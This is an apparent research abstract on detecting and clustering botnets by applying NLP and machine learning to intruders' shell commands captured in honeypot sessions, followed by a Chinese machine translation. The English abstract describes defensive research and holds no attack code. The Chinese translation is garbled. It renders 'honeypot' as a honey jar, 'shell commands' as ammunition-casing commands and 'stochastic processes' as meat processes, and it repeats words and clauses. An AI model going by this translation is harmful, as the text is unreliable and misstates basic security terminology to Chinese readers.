Computer security has been plagued by increasing formidable, dynamic, hard-to-detect, hard-to-predict, and hard-to-characterize hacking techniques. Such techniques are very often deployed in self-propagating worms capable of automatically infecting vulnerable computer systems and then building large bot networks, which are then used to launch coordinated attacks on designated targets. In this work, we investigate novel applications of Natural Language Processing (NLP) methods to detect and correlate botnet behaviors through the analysis of honeypot data. In our approach we take observed behaviors in shell commands issued by intruders during captured internet sessions and reduce them to collections of stochastic processes that are, in turn, processed with machine learning techniques to build classifiers and predictors. Our technique results in a new ability to cluster botnet source IP address even in the face of their desire to obfuscate their penetration attempts through rapid or random permutation techniques.
翻译:计算机安全一直受到日益强大、动态、难以探测、难以预测、难以预测和难以定性的黑客黑客技术的困扰。 此类技术常常被安装在能够自动感染脆弱的计算机系统并随后建造大型机器人网络的自我传播虫体中,这些虫体能够自动感染脆弱的计算机系统,然后用来对指定目标发动协调攻击。 在这项工作中,我们调查了自然语言处理方法的新应用方法,通过分析蜂蜜罐数据来检测和关联肉网行为。 在我们的方法中,我们观察到入侵者在被捕获的互联网会议中发布的弹壳指令中的行为,并把它们减少为收集的肉类过程,而这些过程又通过机器学习技术进行处理,以建立分类器和预测器。 我们的技术成果是,即使在他们渴望通过快速或随机的变换位技术来混淆其渗透尝试时,仍然能够将电脑源IP地址组合成新的能力。